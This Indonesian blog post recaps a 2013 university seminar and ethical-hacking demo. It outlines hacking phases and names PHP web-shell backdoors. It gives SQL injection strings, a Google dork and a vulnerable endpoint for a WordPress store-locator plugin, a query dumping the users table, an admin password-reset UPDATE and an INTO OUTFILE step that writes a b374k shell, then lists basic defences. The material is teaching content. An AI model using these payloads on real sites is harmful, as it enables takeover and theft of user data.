Sabtu, 02 Maret 2013

Rangkaian Full Acara Gebyar ICT HMJTI UIN Malang 2013 Dan Seminar + Demo Hacking With Yogyafree


Materi-materi yang disampaikan :

Teka-Teki Report Password

Pemahaman dasar ethical hacker


Keamanan komputer menjadi penting?
-Perkembangan komputer
-Ketergantungan manusia
-Tuntutan kompleksitas semakin tinggi
-Keamanan menjadi anak tiri
-Kemampuan orang disebut hacker menjadi menurun
-Kemampuan rendah bisa menjadi ancaman tinggi untuk kepentingan umum


Terminologi hacker


uVulnerability
uThreat
uAttack
uExploit

Contoh Situs yang menyediakan exploits

uMetasploit Frameworks
uExploit-db.com
usecurityfocus.com
uDarkc0de.com
upacketstormsecurity.org

Element-element keamanan (CIA)
uConfidentialityKeamanan 
informasi data untuk diketahui atau dibaca oleh pihak yang tidak dikehendaki
uIntegrity / integritas
Keamanan informasi data untuk menghindari adanya perubahan yang tidak dikehendaki
uAvailability
Keamanan informasi data untuk ketersediaan atau keberadaannya

Pengelompokkan hacker
uBlack Hat Hacker
uWhite Hat Hacker
uGrey Hat Hacker
uSuicide Hacker

Tahapan aktifitas Hacking
uReconnaissance
uScanning
uGaining Acces
uMaintaining acces
uCovering Tracks

Reconnaissance
Reconnaissance Passive
uPencarian data target di google
uPencarian data target di berbagai jejaring sosial

Reconnaissance Active
uHTTP Fingerprint

Pencarian exploit berdasarkan scanning
uGoogle.com
uArchive Milw0rm
uArchive Exploit DB
uMetasploit Framework
uDarkc0de 


Gaining Acces
uExploitasi Remote Execution pada celah keamanan OS
uExploitasi Remote Execution pada celah keamanan aplikasi
uExploitasi Remote Execution pada celah keamanan web

Maintaining Acces
PHP Backdoor
uSimple php shell
uR57
uC99 / C100
uASP Backdoor
uB374K

Covering tracks
uPembersihan berbagai exploit atau software yang diupload
uPembersihan jejak disesuaikan dengan penggunaan aplikasi di target dan ke target.

Konsep

GET dan POST
uGET : www.site.com/form.php?nama=zae
uPOST : www.site.com/form.php

IMPLEMENTASI pada method GET & POST
uLangsung dari URL
uHeader : Content-Type: application/x-www-form-urlencoded
uData : variable=value

Query
u$query = “SELECT * FROM contoh WHERE nama =’$username’”;
u$username = dari GET atau POST

SQL Injection

u$query = “SELECT namaTabel FROM contoh WHERE nama =’$username’”; DROP TABLE namaTabel; --

u$query = “SELECT namaTabel FROM contoh WHERE nama =‘terserahOR ‘x’ = ‘x”;

Vulnerability Info
uDescription : Wordpress Plugins - Google Maps via Store Locator Plus Multiple Vulnerability
uVersion : 2.7.1 - 3.0.1
uDate : 26-05-2012
uGoogle Dork : inurl:/wp-content/plugins/store-locator-le/
uAuthor : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
uhttp://www.exemple.com/wordpress/wp-content/plugins/store-locator-le/downloadcsv.php

POST Method, Advanced REST Client
uMethod : POST
uHeader : Content-Type: application/x-www-form-urlencoded
uData : query=[injection]
uContoh:

query=SELECT * FROM wp_users

Mengatasi Teka-Teki Hash
Jangan hanya melihat database, do something!

UPDATE – replace password
UPDATE  wp_users SET  user_pass =  '$P$BAu2rgOUahu8hibdJ12ToW4zu6b.XB.' WHERE  `wp_users`.`ID` =1 LIMIT 1 ;

Mengganti password menjadipassword

Upload b374k via Query
SELECT ’[kode script]INTO OUTFILE “e:/AppServ/www/ict2013/exploit.php
http://localhost/ict2013/wp-content/plugins/store-locator-le/core/load_wp_config.php+ diganti %2B

Base 64 Encryption

Base64 adalah istilah umum untuk sejumlah skema pengkodean serupa yang mengkodekan data biner dan menerjemahkannya ke dalam representasi basis 64. Istilah Base64 berasal dari konten pengkodean MIME tertentu. (Wikipedia, 2010)

PENGAMANAN
Update CMS, plugin
Menggunakan mysql_real_escape_string()
Memberikan validasi pada tiap inputan
Berikan length limit pada inputan
Config database error report
Setting php.ini
dll

lebih lengkapnya download di sini di sini.










0 komentar:

Posting Komentar